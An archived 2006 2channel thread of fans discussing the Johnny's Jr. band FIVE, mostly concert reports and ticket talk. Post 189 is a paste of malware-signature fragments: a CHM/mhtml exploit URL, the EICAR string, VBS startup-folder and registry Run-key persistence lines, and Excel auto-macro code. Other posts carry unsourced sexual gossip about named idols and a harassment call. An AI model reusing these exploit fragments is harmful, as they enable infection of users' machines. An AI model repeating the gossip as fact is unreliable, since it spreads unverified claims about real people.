5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

リベンジ!V(FIVE)7

1 :リ ’.ン’ ス ( ゛w゛ )( =∀= ( )( ‐ v ‐ ノ:2006/03/28(火) 22:13:25
1st liveは体操服
2nd liveはマリオBros.にモデル&ハードゲイ
3rd liveは何をたくらんでいるのやら

先がみえねーこんな扱い 自担の演奏(や)ってるとこ 禿見たい
上手く取れねーチケもあるみたい (金)投げ出すか 耐えるか 自担次第

引き続きコバ犬話もヲゲ マターリ仲良く行きましょう

前スレ
リベンジ!V(FIVE)6
http://tv7.2ch.net/test/read.cgi/jr2/1122387230/
+++過去ログ+++
リベンジ!V(FIVE)5
http://tv7.2ch.net/test/read.cgi/jr/1092321888/
リベンジ!V(FIVE)4
http://music4.2ch.net/test/read.cgi/jr/1068891511/
リベンジ!V(FIVE)3
ttp://makimo.to/2ch/tv2_jr/1012/1012914832.html
リベンジ!V(FIVE) 2
ttp://music.2ch.net/test/read.cgi/jr/995848089/
リベンジ!V(FIVE)
ttp://saki.2ch.net/test/read.cgi?bbs=jr&key=991214213
【参考】FIXEはいつ全員そろうんだ?
ttp://saki.2ch.net/jr/kako/967/967252760.html

2 :( ‐ v ‐ ノ:2006/03/28(火) 22:14:53
2ズサ━━━━⊂(‐ v ‐ノ ⊂⌒`つ≡≡≡━━━━!!

3 :ユーが名無しネ:2006/03/28(火) 22:23:00
>1

>2
自演乙

4 :ユーが名無しネ:2006/03/28(火) 22:57:24
>>1


5 :ユーが名無しネ:2006/03/29(水) 00:47:09
だーかーらーハイパーはやめようよ
空気嫁

6 :ユーが名無しネ:2006/03/29(水) 00:54:21
お前とこの先の活動を共にしてきたいだけ〜
だれが何と言お〜と(自担から)目を離したくはないんだぜ〜
この先誰に付けるかなんて誰にもわかりゃしないんだぜ〜
今を生きるヲタとして ただFIVEに惚れただけ〜

7 :ユーが名無しネ:2006/03/29(水) 01:00:25
全角スマソ

8 :ユーが名無しネ:2006/03/29(水) 01:06:19
さあ専ブラをあけてレスを投稿してごらん
聞こえてくるでしょう
ヲタどものナマの声が

9 :ユーが名無しネ:2006/03/29(水) 09:46:03
ホシュ

10 :ユーが名無しネ:2006/03/29(水) 20:46:53
乙〜

11 :ユーが名無しネ:2006/03/29(水) 21:17:33
乙。

12 :ユーが名無しネ:2006/04/02(日) 08:58:44
広島での5禿楽しそうでした
リッキー+X配ってたりチャーシューはクランキー客席に投げ入れたりしてた


13 :ユーが名無しネ:2006/04/03(月) 14:02:34
>12
kwsk


14 :ユーが名無しネ:2006/04/04(火) 22:08:29
【アナウンスすべきスレ】
 ・蟻梨両方の各ユニスレ(3ユニ・鑢・海老氏・足・窓・魔・急行)→個人スレにも投下おながいと明記する
 ・梨の3ユニ所属の個人スレ
 ・蟻にあるズニア個人スレ


バンド忘れられてる_| ̄|○

15 :ユーが名無しネ:2006/04/05(水) 12:09:58
>14
ドンマイケツ…忘れられる存在にまでなってしまったんだろうか。

16 :ユーが名無しネ:2006/04/05(水) 22:10:09
スレで愚痴るよりこっそり追加してくればいいじゃない

17 :ユーが名無しネ:2006/04/07(金) 01:10:47
去年まいまいと派遣のバイトで働いていたstudioクラブでジャニーズのタッキー&翼の翼君の誕生日会を貸し切りでしたとき。
誕生日会の三分の二はシモネタで盛り上がっていてアイドルもあんな話するんだなーって ちとがっかりした。
主役の翼君はかなり早い時間から出来上がっていてマイクを使いながらしゃべくりまくりでシモネタ大好きみたいだったし。
タッキーのほうがそういうの好きそうなのにタッキーは意外とおとなしくて予想外だった。
今までの武勇伝を話していてタッキーが五股かけていたことを暴露していたりバンドの坊主頭の人が一晩で風俗三軒制覇したと言ってた(笑)
翼君は彼女と一日中エッチしたと言っていて「タッキー&絶倫」と呼ばれて片手をあげて喜んでました。
バンドのなかのひとりも誕生日だったみたいで急遽お祝いして寒い中アマンドまで走り・・・、。
でもその急遽誕生日会したひとが一番かっこよかった☆
あのひとも見たこと無いけどジャニーズなのかな!
今度貸し切りにするときは韓流スターがいいなぁ(^-^)

18 :ユーが名無しネ:2006/04/07(金) 23:43:02
>17
手を繋げよまで読んだ

19 :ユーが名無しネ:2006/04/08(土) 00:17:26
韓国のヴォーカルグループ東方神起(とうほうしんき)の英雄在中(本名 金在中
 20才)が4月7日に韓国で飲酒運転して書類送検されました。
しかし、日本では知られてないことをいいことに5月からの日本ツアーはそのまま
行いそうな感じです。皆の力で東方神起を活動停止にしよう!


 東方神起は男ばかりの5人組
 東方神起は韓国・中国・日本などで活動している
 金在中の親は自動車教習所の理事
 金在中は写真とかではセンターにいることが多い
 金在中は怪我をしていて最近復帰したばかり
 ワンピースのエンディングテーマは東方神起
 その他にもいくつかの日本の番組で東方神起の歌が使われている
 韓国の交通マナーは悪い(リュ・シウォンは交通事故で人を殺しているけど
 普通に仕事をしている。交通事故のシーンがあるドラマにも出てる)


20 :ユーが名無しネ:2006/04/21(金) 06:45:49
ほしゅ

21 :ユーが名無しネ:2006/04/22(土) 15:04:29
昨日のでかい人は誰だったんだ

22 :ユーが名無しネ:2006/04/22(土) 22:33:24
平井堅みたいだたな

23 :ユーが名無しネ:2006/04/29(土) 23:23:36
石鹸を送る会
4/30(日)0:00〜5/1(月)0:00
場所 デビュー企画第1485弾〜石鹸崩壊!苺顔面崩壊!ブサ苺

〔次第〕
【30日0:00】開会の言葉(三都担)
式辞(カツン担)
石鹸デブから活動停止までの回想
著名人からの電報紹介(光子徹子担)
来賓祝辞(須磨禁忌部位あらち担)
送辞(次世代担)
答辞(石鹸担)
3分間の黙祷
石鹸担最後の馴れ合い
【30日23:50】サヤエンドウ合唱
【〜1日0:00】閉会の言葉(環八担)

司会(カーニバル)

※叩きは一切禁止
※滝込みご飯と円鳥パンは無料配布

24 :ユーが名無しネ:2006/05/03(水) 20:58:45
横蟻 カツンはネ申かもしんまい
特に上田(2ネームシラネ)

25 :ユーが名無しネ:2006/05/03(水) 22:27:11
kwsk

26 :ユーが名無しネ:2006/05/03(水) 22:29:51
>24
一生ロムってろ

27 :ユーが名無しネ:2006/05/04(木) 19:03:28
今年もライブやってくれんのかなー

28 :ユーが名無しネ:2006/05/05(金) 00:28:05
やってもらわないと困る

29 :ユーが名無しネ:2006/05/05(金) 00:41:15
人気ないから無理でしょ

30 :ユーが名無しネ:2006/05/05(金) 11:23:46
しうまいは構成変わって爺とのセッション前の5のネタ削られた
2部限定で花道通るのもなくなった
少々ガックシだがロソロとムビステで動くのは変わらずウマーでテラ楽しかった

31 :ユーが名無しネ:2006/05/05(金) 20:29:23
やるよ

32 :ユーが名無しネ:2006/05/05(金) 21:43:34
ブサイクばっかりじゃん
特にチビの2人

33 :ユーが名無しネ:2006/05/06(土) 22:08:55
大魔人のパンツの丈が短くないんで安心したお
手首に巻いてるのはオサレなんだよね?リスカ隠してるとか?

34 :ユーが名無しネ:2006/05/07(日) 00:38:40
リスカなんてしてないよ

35 :ユーが名無しネ:2006/05/07(日) 10:28:18
チャシュのせつない歌を聴きたいもんです

36 :ユーが名無しネ:2006/05/07(日) 23:46:45
リンス担お金持ちー

37 :ユーが名無しネ:2006/05/09(火) 17:55:40
顎のマネーしてる大魔人とリキ、テラカワユス

38 :ユーが名無しネ:2006/05/10(水) 01:55:28
顎だれ?西?

39 :ユーが名無しネ:2006/05/13(土) 17:23:42
裸少のラーメンすする大魔人に萌ユス



40 :ユーが名無しネ:2006/05/13(土) 23:17:20
チャーシューに何があったのかわからないがヨディ乙

41 :ユーが名無しネ:2006/05/14(日) 02:18:54
チャーシュー体調不良

42 :ユーが名無しネ:2006/05/14(日) 09:30:52
大魔人すち

43 :ユーが名無しネ:2006/05/14(日) 22:28:03
目隠しドラム叩きチャス燃え

44 :ユーが名無しネ:2006/05/14(日) 23:31:16
爺とのボイパセッションでチャーシューがタオルで目隠しして
ドラム叩いたら凄いキャーキャー言われてた

45 :ユーが名無しネ:2006/05/15(月) 20:01:25
メソバー紹介でピンで抜いてくれるときに
エアギタとかしちゃえばいいのにね

46 :ユーが名無しネ:2006/05/16(火) 00:42:23
めざましウマーだた
テラウレシス

47 :ユーが名無しネ:2006/05/19(金) 00:16:57
力也大好き

48 :ユーが名無しネ:2006/05/19(金) 07:52:59
私も大好き

49 :ユーが名無しネ:2006/05/20(土) 01:13:15
本気かよ

50 :ユーが名無しネ:2006/05/20(土) 12:34:26
こいつらデブする気あるの?

51 :ユーが名無しネ:2006/05/20(土) 13:15:11
デヴする気はあるさ
問題は蛇兄がさせる気があるかだ

52 :ユーが名無しネ:2006/05/20(土) 15:11:11
本当ゎ2001年にFIVE+すばるでavexからデビューするはずだったんだよ!デモすばるの墨がバレてavexから断られてナシになったんですο

53 :ユーが名無しネ:2006/05/20(土) 15:59:32
853 名前: ユーは名無しネ 投稿日: 2006/05/18(木) 13:47:18 ID:+YwAQz3X
FIVEコン決定という葉書がくるように皆で協力お願いいたします。
まず始めに、いろんなところから攻めていく作戦!!
官製はがきで・・・

1、ファミリークラブ
150-8550 渋谷区渋谷1-10-10 ミヤマスターB1
【FIVEコンやって下さい】

2、wink up
150-8482 恵比寿4-4-9 えびす大黒ビル wink up編集部様
【いつもFIVEを載せて頂きありがとうございます。】

3、POTATO
141-0031 品川区西五反田8-1-14 最勝ビル8階
学研 POTATO編集部様
【FIVEを載せてください】

4、ザ・少年倶楽部
150-8001 NHK BS-2 ザ・少年倶楽部 リクエスト係り
【FIVEを出してください】


皆で協力しましょう!!


54 :ユーが名無しネ:2006/05/20(土) 20:47:37
す戻ってきて。

55 :ユーが名無しネ:2006/05/21(日) 21:04:01
5メソも蛇兄波のメール出してもいいんじゃまいか?

56 :ユーが名無しネ:2006/05/21(日) 21:43:06
Mステにもリクエストしてみた
ムボーか?

57 :ユーが名無しネ:2006/05/23(火) 20:14:28
このユニってもう消滅寸前だよな

58 :ユーが名無しネ:2006/05/24(水) 02:02:12
orz

59 :ユーが名無しネ:2006/05/24(水) 07:35:20
インディーズとかでやっちゃえばいいのに

60 :ユーが名無しネ:2006/05/24(水) 14:05:26
蛇兄の肩書きがなきゃ・・(ry

61 :ユーが名無しネ:2006/05/28(日) 19:07:46


62 :ユーが名無しネ:2006/05/29(月) 14:26:49
あ?

63 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/05(月) 14:19:40
age

64 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/06(火) 01:10:25
リッキーハピバデ!
これからもいい歌作ってLIVEで聞かせてくれよな
オマイの曲のセンス大好きだ

65 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/06(火) 18:09:43
リッキー23歳の誕生日おめー!

66 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/07(水) 04:51:38
ライブ決定マダー?(・∀・ ) っ/凵 チンチン

去年は7月下旬発表→9月品川
一昨年は6月下旬発表→8月渋谷

今年はどうかな?でないと夏の予定が立てられない

67 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 04:54:24
チンチン

68 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 11:49:12
ちんちん

69 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 19:08:54
石鹸はこのまま自然消滅なんだろうな


『サヤエンドウ/裸足のシンデレラボーイ』
2006.3.15Release (期間限定生産 2006年6月30日まで)

TEPPEN
2005.7.13Release ※初回通常盤共に生産終了

チェリッシュ
2005.3.16Release ※初回通常盤共に生産終了

紅く燃ゆる太陽
2004.8.11Release ※初回通常盤共に生産終了

希望〜Yell〜
2004.5.12Release ※初回通常盤共に生産終了

70 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/11(日) 07:39:44


71 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/17(土) 01:59:24
なんか書きたいことあったら避難所ドゾー
http://jbbs.livedoor.jp/music/14433/
寂れてるけど不快なものは削除していう方針なんで
勿論厨なんかもあぼんするし

72 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/24(土) 23:15:29
3ユニ(NEWS・関ジャニ∞・KAT-TUN)関連スレを現Jr板へ
それ以外のジュニアスレを現裏Jr.板へ移動して
住み分けするか否かの投票を行います

・投票期間(時間外の投稿は無効です)
H18.6.30(金)0:00:00-23:00:59

・投票方法 (Jr.板自治スレでご確認ください)
[[コード]]+<<賛成>>又は<<反対>>で投票して下さい
※コードは完全一致のみ有効です
※<<賛成>><<反対>>も半角でなければ集計されないかもしれません
  間違えがないようにコピー/ペースト等で対応してください
※投票スレは998まで使い切ってから次スレに移動してください
※有効投票は集計の関係でレス998まで、それ以降の投票は次スレでお願いします
※レスのタイミングで999以降になってしまった場合は次スレで再度投票してください

・参考
Jr.板の自治を考えるスレッド【23】
http://tv7.2ch.net/test/read.cgi/jr/1149947336/

73 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/28(水) 22:29:29
リンスタンオメ!!

74 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/29(木) 23:04:37
つ紺につくのかな

75 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 07:29:29
あらちにはつかないの?
つ紺と日程被ってるよな

76 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/30(金) 15:36:20
あらちよりつだとオモー

77 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/07/01(土) 00:54:13
あらちつかないよ_| ̄|○

78 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 15:03:40
あら残念

79 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 15:46:22
>77
マジでつかないの?

80 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 18:19:30
つかないよ

81 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 19:22:58
干されてるね

82 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 19:40:58
つ紺がある

83 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 20:53:51
来るファイブコンに向けてリハに入っているという希望

84 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 22:13:38
5紺今年は期待出来ない

85 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 22:46:31
人気ないし無理
5担って世界中で100人ぐらいでしょ

86 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/01(土) 22:54:28
100人もいたのか

87 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 00:09:06
ズニアに5担がいるから

88 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/02(日) 00:32:22
近畿に二度とつかないんだろうな_l ̄l○
F紺DVD見ると目汁出る

89 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/06(木) 00:58:28
Q?出すぎだよねorz
リンスもQ担の中ではボミョンだしセツナス

90 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/08(土) 21:54:21
紺仕事は5の方が優先ぽくないか?

91 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/11(火) 15:06:44
リンスタンは大冒険するのか?

92 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/13(木) 22:19:05
Q出てきた時点で5は辞めるのかと思ったらそうでもない
でも仕事は皆無ってどういう事だ

93 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/15(土) 16:02:58
どう見ても皆無じゃない件

94 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/15(土) 22:41:59
>93
92はリッキー担なんじゃネーノ?

95 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/19(水) 20:19:49
つ紺につくの?

96 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/23(日) 02:23:09
今更だけど滝紺に付きましたか?

97 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/23(日) 09:41:23
つきましたよ

98 :名無し・LR議論中@ユーは自治スレへ:2006/07/25(火) 17:35:09
>95
蛇網では窓のみ

99 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 23:35:00
す親分紺にお声はかかるのだろうか?

100 :名無し・LR議論中@ユーは自治スレへ:2006/07/27(木) 05:57:07
ないとオモー

101 :ユーは名無しネ:2006/07/30(日) 23:33:19
リンスとチャーシューのスレ引っ越すまでもなくここで足りそうだな

102 :ユーは名無しネ:2006/07/31(月) 10:48:27
もう個人スレはいらないよね

103 :ユーは名無しネ:2006/08/12(土) 02:31:55
あげ

104 :ユーは名無しネ:2006/08/13(日) 22:11:27
DVDに映ってると良いな

105 :ユーは名無しネ:2006/08/14(月) 07:50:49
つ紺入ってきた
5は全員左側一ヶ所に固まってた
2アンコで大魔人が右側に動いてた
5コーナーはナシだがアンダルシアでリッキーギターソロあり
アンコのどれかでリンスが跳んでて楽しそうだた
去年程前に出たりはなかったが、つが一人一人紹介したりしてた
大魔人がつに「足長い」とか「8頭身」とか言われ、スクリーンに映ってると思ってモデルっぽく回ってたが、スクリーンに映ってなくて「映ってないよ」とつに突っ込まれてた
チャーシューは「寝てんの?」とか言われてた気がする
リンスは帽子被ってた
リッキーはしゃべらされたりしてたが、フツーすぎて笑われてた

とりあえず思いつくものだけレポしてみた
長文スマソ

106 :ユーは名無しネ:2006/08/14(月) 11:21:10
あげ

107 :ユーは名無しネ:2006/08/16(水) 17:02:59
す親分紺にお声がかかってよかったな

108 :ユーは名無しネ:2006/08/17(木) 01:04:23
>107
ソースは?

109 :ユーは名無しネ:2006/08/19(土) 05:51:20
環八チケスレと環八担

110 :ユーは名無しネ:2006/08/20(日) 20:18:47
斗とPとジュニア4人の合計6人の新ユニットができて11月にCDデビューするらしいです
CDデビューは日本と台湾と韓国の3カ国同時デビューです
メインはもちろん斗とPです
ジュニア4人は20前後で現時点ではどちらかというと無名
とにかく斗オメー!

111 :ユーは名無しネ:2006/08/25(金) 14:20:45
す紺の追加はつ紺と被るけど、どうなんの?


112 :ユーは名無しネ:2006/08/26(土) 07:21:23
>111
もともと環八チケスレで言われてただけでソースもないんだから出ないんじゃね

113 :ユーは名無しネ:2006/08/26(土) 14:37:37
そもそも親分がいるのに5がつくなんてアリエネー

114 :ユーは名無しネ:2006/08/27(日) 00:55:51
でも環八紺にQついてたから分からんよな

115 :ユーは名無しネ:2006/08/27(日) 01:39:40
そういえば出雲のバンド編成もありえないメンツだったしな

116 :ユーは名無しネ:2006/08/27(日) 04:28:50
Zeppつかないよ
す紺でるから

117 :ユーは名無しネ:2006/08/28(月) 09:38:12
マジすか?

118 :ユーは名無しネ:2006/08/28(月) 18:59:20
>116
ソースあんのかよ
す親>つなんてアリエナス

119 :ユーは名無しネ:2006/08/28(月) 22:03:37
ちょおま釣られ杉じゃね?

120 :ユーは名無しネ:2006/08/29(火) 11:16:05
釣られついでにこの眼で見てくる ノシ

121 :ユーは名無しネ:2006/08/29(火) 13:29:36
釣られて正解ですよ

122 :ユーは名無しネ:2006/08/29(火) 16:52:49
出てますた 前半一曲、アコースティックで前出て「8分やります、トイレに行きたい人は行って下さい」で3曲(?)位やって 「トイレに行った人も帰って来たと思うんで」 で『手』をやりますた

123 :ユーは名無しネ:2006/08/29(火) 18:59:59
すも親分も116もネ申

124 :ユーは名無しネ:2006/08/29(火) 19:04:43
むしろ死神

125 :ユーは名無しネ:2006/08/29(火) 19:54:41
でっかいどうだけつ紺バック欠席なのかorz

126 :ユーは名無しネ:2006/08/29(火) 20:39:20
あと広島はリンスが欠席ね

127 :ユーは名無しネ:2006/08/29(火) 20:57:39
全てのZepp欠席です

128 :ユーは名無しネ:2006/08/29(火) 22:13:52
じゃ名古屋は?

129 :ユーは名無しネ:2006/08/29(火) 22:21:32
チャシュはスティック投げたね

130 :ユーは名無しネ:2006/08/29(火) 22:22:07
>126
つ紺>運動会じゃないの?
岸がつ紺の方に来るとは思えない

131 :ユーは名無しネ:2006/08/29(火) 22:36:24
自分はPZ組・T女・5があってのつスタイルだと思ってるから
地方も欠席はしないと思うが甘いのか?

132 :ユーは名無しネ:2006/08/29(火) 22:37:15
鯱もみまんは出る

133 :ユーは名無しネ:2006/08/29(火) 23:13:03
>130 131
事務所HPの音楽運動会の出演者ってとこ
リンク貼ってあって、名前書いてあんのよ





もしかして 石垣大佑ってリンスと別人?

134 :ユーは名無しネ:2006/08/29(火) 23:18:58
>133
そんな丁寧に説明してくれなくても蛇網はガイシュツ
つかあれ本気であてにしてるヤシいるんだな

135 :ユーは名無しネ:2006/08/29(火) 23:29:14
>131
今回のつ紺はバンド無しでもオゲな構成だけど
す紺は無しだとムリっぽいから例外もあるかと
しかし急に厨で賑わってどうしたんだ

136 :ユーは名無しネ:2006/08/29(火) 23:29:41
夏休みももう終わりですね

137 :ユーは名無しネ:2006/08/29(火) 23:35:06
今年のつ紺<す紺
オリ曲もMCもテラウマー

138 :ユーは名無しネ:2006/08/30(水) 00:15:12
本日お世話になった他担ですが5の皆さんが大層カクイかったのでちょっとお邪魔します
リッキーがスゲー盛り上げ上手で歌も上手くてビクーリしました
チャーシューも親分とツインドラムで演奏してアイコンタクトしたりしてキャワでした
MCも皆仲良さそうでとても面白かったです

139 :ユーは名無しネ:2006/08/30(水) 00:39:58
環八担だか甘受担だか知らんが厨はフットワーク軽いな
まず自スレで半年ロムる事をオススメする

140 :ユーは名無しネ:2006/08/30(水) 08:42:42
この調子でぜしこの冬に5魂でも…

141 :ユーは名無しネ:2006/08/30(水) 11:08:11
冬じゃない秋

142 :ユーは名無しネ:2006/08/30(水) 16:36:25
>138

これをきっかけに5のことも少しは気にかけてみてください
139みたいなカルシウムたんねーやつのことはシカトして

143 :ユーは名無しネ:2006/08/30(水) 17:30:52
遅刻したリンスタソモエス

144 :ユーは名無しネ:2006/08/30(水) 18:49:41
メガネの大魔人もギザモエス

145 :ユーは名無しネ:2006/08/30(水) 19:56:21
チャシュほっぺた膨らましながらドラム叩くのデラカワユス

146 :ユーは名無しネ:2006/08/30(水) 21:50:55
ハンカチ王子・コロ助・ファ#オナラのリッキー2006キャワキャラ宣言

147 :ユーは名無しネ:2006/08/30(水) 21:59:56
巣でオッサンキャラリッキーギザワロス

148 :ユーは名無しネ:2006/08/30(水) 23:48:41
チャシュのドラムセットの横になんでスネアが転がってたの?
カノウプスって自前?

149 :ユーは名無しネ:2006/08/31(木) 00:03:44
>146
kwsk

150 :ユーは名無しネ:2006/08/31(木) 00:29:12
他担ですが失礼します
今回のす親LIVEでの5の皆さんの演奏に惚れてしまいました
とても素晴らしい3時間をありがとうございました

ではスレ汚し失礼いたしました

151 :ユーは名無しネ:2006/08/31(木) 00:36:34
>149
・5のオリ曲の時(?)青いハンカチで汗拭いてた
 (モニタにも映った)
・MC中麺がご飯中にリッキーがオナラしてリンスが「ファシャープだ!」と言った話
 (キーボードで弾いてくれたが高めな音ダタ)
・餡子にチョンマゲ姿で登場
 (キャワの声に「2006年はキャワキャラで逝く」)

記憶が定かでないがこんなカンジ

すが色紙に「5はいいバンドです」をカメラに大写しにしてくれて
目汁でた
W餡子です親分とマンセーしてる姿は麺もテラ嬉しそうダタ


152 :ユーは名無しネ:2006/08/31(木) 00:59:51
オリ曲字幕スーパー入れてくれてたね

すが5のこと盛んに紹介してくれてたよ


153 :ユーは名無しネ:2006/08/31(木) 01:07:21
リキって好かれてるよね男にw

154 :ユーは名無しネ:2006/08/31(木) 11:02:47
リキってそういう人柄お持ちなんだね

155 :ユーは名無しネ:2006/08/31(木) 12:01:24
リンス、福岡札幌仙台つかないって

156 :ユーは名無しネ:2006/08/31(木) 12:10:28
リンスって腱鞘炎なのかな 酷使してるから心配だお

157 :ユーは名無しネ:2006/08/31(木) 12:21:44
>149
ありがdクスコ

158 :ユーは名無しネ:2006/08/31(木) 13:56:39
5も好きな他担がちょっとだけ
曲はガイシュツの通り3曲
全公演同じ曲やりました
1曲目は去年つ魂でやった「生」のような気がしたが
自信ないのでわからず
2曲目は2日目から画面に歌詞のテロップ出た
リッキー曰く曲名は「今」
3曲目は「You and me」?←避難所もロムってみたが手を繋ぐ曲のタイトルっこれでオゲ?
「スバル君が好きな人は右手、オークラが好きな人は左手をあげてください
 5が好きな人はその手を降ろさないで!」
と、この曲では手繋ぎ前から色々煽ってた
全体的に全部演奏は5
すや親分の曲でコーラスしたりもしてた
あとツインドラムでドラムソロ(?)があって
チャーシューと親分二人で叩きながら顔何度も見合わせてにこにこしてテラキャワス
MCもゲストありの30日2部以外は5とす親で座ってマターリ
自分30日ラストは二階後方だったが
この回は5曲は周りの環八甘受担もみんな手拍子してて一番盛り上がってた

まだまだ書きたいことあるがロムり不足でウザーだと思うのでこの辺で
5担姐さん曲名のフォローよろですん

159 :ユーは名無しネ:2006/08/31(木) 15:54:13
一曲目は生ではナスビ
最後は手(YOU&ME)

160 :158:2006/08/31(木) 18:40:54
>159
フォロー屯です
自分はバンドが5で凄く嬉しかったんだが
ここの姐さん達はあまり入れなかったんだな(;´・ω・`)
5が一緒で嬉しい反面自担が浮くかもと不安だったんだが
そんなの心配ご無用で5には感謝の気持ちでイパーイです
いい雰囲気で本当にカコイイライブだったよ
来月の追加に行ける姐さんは楽しんできて呉

161 :ユーは名無しネ:2006/08/31(木) 19:31:48
>>155
福岡仙台札幌つかないのか…
知らなかったよ…
リンス担の私はチケットを売ろうと思います。

162 :ユーは名無しネ:2006/08/31(木) 20:16:25
Zeppはつかないと前にもガイシュツ

163 :ユーは名無しネ:2006/08/31(木) 21:23:21
リンスつかないとセレネイとかつまらんね

164 :ユーは名無しネ:2006/08/31(木) 22:20:26
宗教担はキモイからみんな氏ねばいいのに

165 :ユーは名無しネ:2006/08/31(木) 22:46:15
大魔人って筋肉ついていい感じだけど、あんまりムキマッチョにならんで
欲しいよね

166 :ユーは名無しネ:2006/08/31(木) 23:23:11
リンスがいないんじゃtake your handsのコーラスは誰が

167 :ユーは名無しネ:2006/08/31(木) 23:24:15
リッチーとダイマジンで

168 :ユーは名無しネ:2006/09/01(金) 00:05:49
5みんないないよ

169 :ユーは名無しネ:2006/09/01(金) 18:37:52
のだめカンタービレ?ってドラマにリンス出ちゃえばいいのにね。

170 :ユーは名無しネ:2006/09/01(金) 22:33:25
他ユニ担ですが失礼いたします
17日はす親紺とつ紺がかぶってますが
5の皆様はどちらにつくのですか?

171 :ユーは名無しネ:2006/09/02(土) 09:59:49
す紺です

172 :ユーは名無しネ:2006/09/02(土) 17:09:35
がっかりだよ!

173 :ユーは名無しネ:2006/09/04(月) 18:42:16
つ紺まだ売れ残ってるのか。。

174 :ユーは名無しネ:2006/09/05(火) 01:42:20
いないんじゃ買わない
増やそうと思ってたのに

175 :ユーは名無しネ:2006/09/06(水) 12:41:26
今度のW誌は掛け合いかなー。

176 :ユーは名無しネ:2006/09/07(木) 00:05:12
リンス滝のにもでてるんだ

177 :ユーは名無しネ:2006/09/07(木) 00:32:35
リンス乙華麗

ピアノ弾けるのもう一人くらい居た方がよくね?

178 :ユーは名無しネ:2006/09/08(金) 00:01:24
>177
岸くん

179 :ユーは名無しネ:2006/09/08(金) 00:51:06
弾けねぇだとう〜

180 :ユーは名無しネ:2006/09/10(日) 22:13:32
リンスには悪いけど、他の弾ける人出てきて
そっちが人気出たら嫌

181 :ユーは名無しネ:2006/09/10(日) 23:11:59
クエにリンス取られるならやむなし

182 :ユーは名無しネ:2006/09/17(日) 22:21:09
す親紺テラ楽しかった

183 :ユーは名無しネ:2006/09/17(日) 22:39:03
5はオーラス4曲歌ってました
5が本当にかっこよくてファンになった
ずっと演奏してくれてありがとう

184 :ユーは名無しネ:2006/09/17(日) 23:56:40
やっぱりリンスは5だよ!

185 :ユーは名無しネ:2006/09/18(月) 03:14:18
す親禿楽しかた!
隣の人とお手てつなげ繋いで歌って盛り上がりました。
最後は5す親で手繋いで敬礼してました。
5のお陰です親魂も盛り上がりました。長い間、ずっと演奏してくれてお疲れ様。
ありがとう!


186 :ユーは名無しネ:2006/09/18(月) 03:15:48
すみません、sage忘れました…orz

187 :ユーは名無しネ:2006/09/18(月) 14:36:25
つ紺残りつくかな?

188 :ユーは名無しネ:2006/09/18(月) 19:50:31
>187
牛舌以外はつくんじゃない?

189 :<body onload=window()>:2006/09/19(火) 14:26:20
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

190 :ユーは名無しネ:2006/09/19(火) 15:47:17
29日のす親紺行ったケド楽しかった
感動した
すが自担で行ったが5盛り上げ上手でスチになった!
出演者をアイドルでなくアーチストとして見てた
みんなありがとう!

191 :ユーは名無しネ:2006/09/20(水) 10:09:44
>190
たのしかったよね!
